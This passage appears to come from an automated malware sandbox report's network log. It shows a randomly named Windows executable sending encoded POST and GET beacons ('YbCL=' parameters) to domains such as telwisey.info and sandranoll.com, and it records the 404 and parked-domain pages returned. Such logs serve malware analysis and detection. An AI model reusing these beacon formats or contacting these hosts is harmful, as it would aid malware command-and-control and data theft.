                                          Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          23 | 192.168.2.7 | 49730 | 199.192.19.19 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:54:51.426166058 CEST | 1820 | OUT | POST /ei85/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.telwisey.info
                                          Origin: http://www.telwisey.info
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.telwisey.info/ei85/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 51 4d 6a 49 44 30 37 73 78 72 59 4d 30 2b 44 44 59 34 79 58 53 41 38 47 4e 67 78 6a 76 36 4c 69 72 39 77 6b 32 6f 4a 6e 56 4e 53 6b 68 44 55 4d 67 32 78 79 59 7a 76 74 67 58 74 6f 6e 34 71 6a 68 44 75 4c 6a 4d 5a 52 78 55 5a 61 46 61 74 61 47 4d 41 32 35 49 52 72 70 72 64 46 4d 68 43 62 31 73 43 4c 36 6e 54 4c 43 5a 33 75 72 69 71 63 71 38 4e 75 32 4d 45 6a 2b 53 37 61 4c 39 35 58 73 4a 30 38 77 48 73 49 77 51 51 32 31 7a 76 2b 79 75 47 47 57 64 33 44 6b 68 51 4a 65 45 2f 6f 34 73 77 [TRUNCATED]
                                          Data Ascii: YbCL= [TRUNCATED]
                                          Jul 4, 2024 16:54:52.051856041 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:51 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:52.051881075 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                          Jul 4, 2024 16:54:52.051893950 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                          Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                          Jul 4, 2024 16:54:52.051987886 CEST672INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                          Jul 4, 2024 16:54:52.052002907 CEST1236INData Raw: 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33 22 20 79 32 3d 22 34 39 33 2e 37 31 33 22 20
                                          Data Ascii: limit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0620" stroke-wid
                                          Jul 4, 2024 16:54:52.052015066 CEST224INData Raw: 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g>
                                          Jul 4, 2024 16:54:52.052026987 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                          Jul 4, 2024 16:54:52.052040100 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                          Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                          Jul 4, 2024 16:54:52.052053928 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                          Jul 4, 2024 16:54:52.052370071 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                          Jul 4, 2024 16:54:52.057169914 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          24 | 192.168.2.7 | 49731 | 199.192.19.19 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:54:53.975816965 CEST | 527 | OUT | GET /ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.telwisey.info
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:54:54.582721949 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:54 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:54.582777023 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
                                          Jul 4, 2024 16:54:54.582789898 CEST1236INData Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                          Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
                                          Jul 4, 2024 16:54:54.582945108 CEST672INData Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30
                                          Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
                                          Jul 4, 2024 16:54:54.582957029 CEST1236INData Raw: 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33
                                          Data Ascii: d" stroke-miterlimit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0
Jul 4, 2024 16:54:54.582967997 CEST  224                IN         Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g>
Jul 4, 2024 16:54:54.583002090 CEST  1236               IN         Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
Jul 4, 2024 16:54:54.583014965 CEST  1236               IN         Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
Jul 4, 2024 16:54:54.583026886 CEST  448                IN         Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" />
Jul 4, 2024 16:54:54.583153009 CEST  1236               IN         Data Ascii: <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <
Jul 4, 2024 16:54:54.588082075 CEST  1236               IN         Data Ascii: l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" str


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
25          192.168.2.7  49732        213.145.228.168  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 4, 2024 16:54:59.779588938 CEST  790                OUT        POST /aroo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.sandranoll.com
Origin: http://www.sandranoll.com
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 217
Referer: http://www.sandranoll.com/aroo/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Data Ascii: YbCL=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl6r8k2GeH8fqqMooHBHSwwhdC6d/5BTny6lir/qL+/msuUUsXOw==
Jul 4, 2024 16:55:00.535612106 CEST  1236               IN         HTTP/1.1 404 Not Found
Date: Thu, 04 Jul 2024 14:55:00 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/7.4.33
Strict-Transport-Security: max-age=63072000; preload
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: d31<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Jul 4, 2024 16:55:00.535774946 CEST  1236               IN         Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
Jul 4, 2024 16:55:00.535789967 CEST  1183               IN         Data Ascii: ing Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img src="https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif" alt="Hosting Control Panel" /></td><td style="width:300px;">Mit dem Domaintechnik
Jul 4, 2024 16:55:00.539392948 CEST  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
26          192.168.2.7  49733        213.145.228.168  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 4, 2024 16:55:02.327495098 CEST  810                OUT        POST /aroo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.sandranoll.com
Origin: http://www.sandranoll.com
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Referer: http://www.sandranoll.com/aroo/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Data Ascii: YbCL=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwl5+fbPW16H4kmzyI/fgRJEZGNTYEAzJWHFewLRusIHTedYiig=
Jul 4, 2024 16:55:03.049491882 CEST  1236               IN         HTTP/1.1 404 Not Found
Date: Thu, 04 Jul 2024 14:55:02 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/7.4.33
Strict-Transport-Security: max-age=63072000; preload
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: d29<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Jul 4, 2024 16:55:03.049530029 CEST  1236               IN         Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
Jul 4, 2024 16:55:03.049541950 CEST  1175               IN         Data Ascii: Pakete bei Domaintechnik&reg;</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/pakete11.png" alt="Hosting Pakete" /></td><td
Jul 4, 2024 16:55:03.052833080 CEST  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
27          192.168.2.7  49734        213.145.228.168  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 4, 2024 16:55:04.866548061 CEST  1823               OUT        POST /aroo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Host: www.sandranoll.com
Origin: http://www.sandranoll.com
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1249
Referer: http://www.sandranoll.com/aroo/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Data Ascii: YbCL= [TRUNCATED]
Jul 4, 2024 16:55:05.599817038 CEST  1236               IN         HTTP/1.1 404 Not Found
Date: Thu, 04 Jul 2024 14:55:05 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/7.4.33
Strict-Transport-Security: max-age=63072000; preload
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Jul 4, 2024 16:55:05.599869013 CEST  1236               IN         Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">878<table><tr><td><ta
